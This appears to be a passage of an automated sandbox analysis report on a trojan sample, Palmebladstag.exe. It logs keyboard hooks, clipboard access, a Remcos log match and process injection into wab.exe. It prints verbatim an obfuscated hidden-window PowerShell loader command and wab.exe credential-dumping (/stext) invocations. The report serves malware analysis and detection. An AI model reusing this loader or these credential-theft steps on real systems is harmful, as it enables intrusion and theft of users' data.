              Source: powershell.exe, 00000002.00000002.3049075645.00000000047F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.3049075645.0000000004946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: wab.exe, 0000000A.00000002.3102208643.0000000002A3C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
              Source: wab.exe, 0000000A.00000002.3102519255.0000000002DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?clien
              Source: wab.exe, 0000000A.00000002.3102519255.0000000002DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
              Source: wab.exe, 0000000A.00000002.3102704298.0000000003039000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.3101806409.0000000003039000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
              Source: wab.exe, 0000000A.00000002.3102519255.0000000002DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 0000000A.00000002.3102519255.0000000002DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.3051799835.0000000005855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, wab.exe, 0000000C.00000002.3085535723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000009.00000002.3385414455.0000000002DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3393823082.00000000087B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6820, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004016FD NtdllDefWindowProc_A,11_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004017B7 NtdllDefWindowProc_A,11_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402CAC NtdllDefWindowProc_A,12_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402D66 NtdllDefWindowProc_A,12_2_00402D66
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_004030EF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030EF
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_004048010_2_00404801
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0432F0102_2_0432F010
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0432F8E02_2_0432F8E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0432ECC82_2_0432ECC8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0432156C2_2_0432156C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_043296682_2_04329668
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0704D6182_2_0704D618
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_243A71949_2_243A7194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_2439B5C19_2_2439B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B04010_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043610D10_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044731010_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044A49010_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040755A10_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043C56010_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B61010_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044D6C010_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004476F010_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B87010_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044081D10_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0041495710_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004079EE10_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407AEB10_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044AA8010_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00412AA910_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404B7410_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404B0310_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044BBD810_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404BE510_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404C7610_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00415CFE10_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00416D7210_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00446D3010_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00446D8B10_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00406E8F10_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040503811_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041208C11_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004050A911_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040511A11_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043C13A11_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004051AB11_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044930011_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040D32211_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A4F011_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043A5AB11_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041363111_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044669011_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A73011_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004398D811_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004498E011_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044A88611_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043DA0911_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00438D5E11_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00449ED011_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041FE8311_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00430F5411_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004050C212_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004014AB12_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040513312_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004051A412_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040124612_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040CA4612_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040523512_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004032C812_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040168912_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402F6012_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: Palmebladstag.exe, 00000000.00000003.2162961318.0000000000982000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Palmebladstag.exe
              Source: Palmebladstag.exe, 00000000.00000002.2164505135.0000000000982000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Palmebladstag.exe
              Source: Palmebladstag.exe, 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamestetisering.exed" vs Palmebladstag.exe
              Source: Palmebladstag.exeBinary or memory string: OriginalFilenamestetisering.exed" vs Palmebladstag.exe
              Source: Palmebladstag.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@14/64@1/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,10_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,12_2_00410DE1
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_004042C5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,10_2_00413D4C
              Source: C:\Users\user\Desktop\Palmebladstag.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,10_2_0040B58D
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile created: C:\Program Files (x86)\saalskaanerensJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile created: C:\Users\user\inputed.iniJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GZK076
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile created: C:\Users\user\AppData\Local\Temp\nspDB0D.tmpJump to behavior
              Source: Palmebladstag.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, wab.exe, 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000009.00000002.3405899060.00000000247E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 0000000A.00000002.3102101953.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Palmebladstag.exeReversingLabs: Detection: 50%
              Source: Palmebladstag.exeVirustotal: Detection: 25%
              Source: C:\Users\user\Desktop\Palmebladstag.exeFile read: C:\Users\user\Desktop\Palmebladstag.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-33262
              Source: unknownProcess created: C:\Users\user\Desktop\Palmebladstag.exe "C:\Users\user\Desktop\Palmebladstag.exe"
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\apzqjktfdlnytnymteytleohyelguybueg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cjmbkce"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mlstdvoafb"
              Source: C:\Users\user\Desktop\Palmebladstag.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\apzqjktfdlnytnymteytleohyelguybueg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cjmbkce"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mlstdvoafb"Jump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Palmebladstag.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
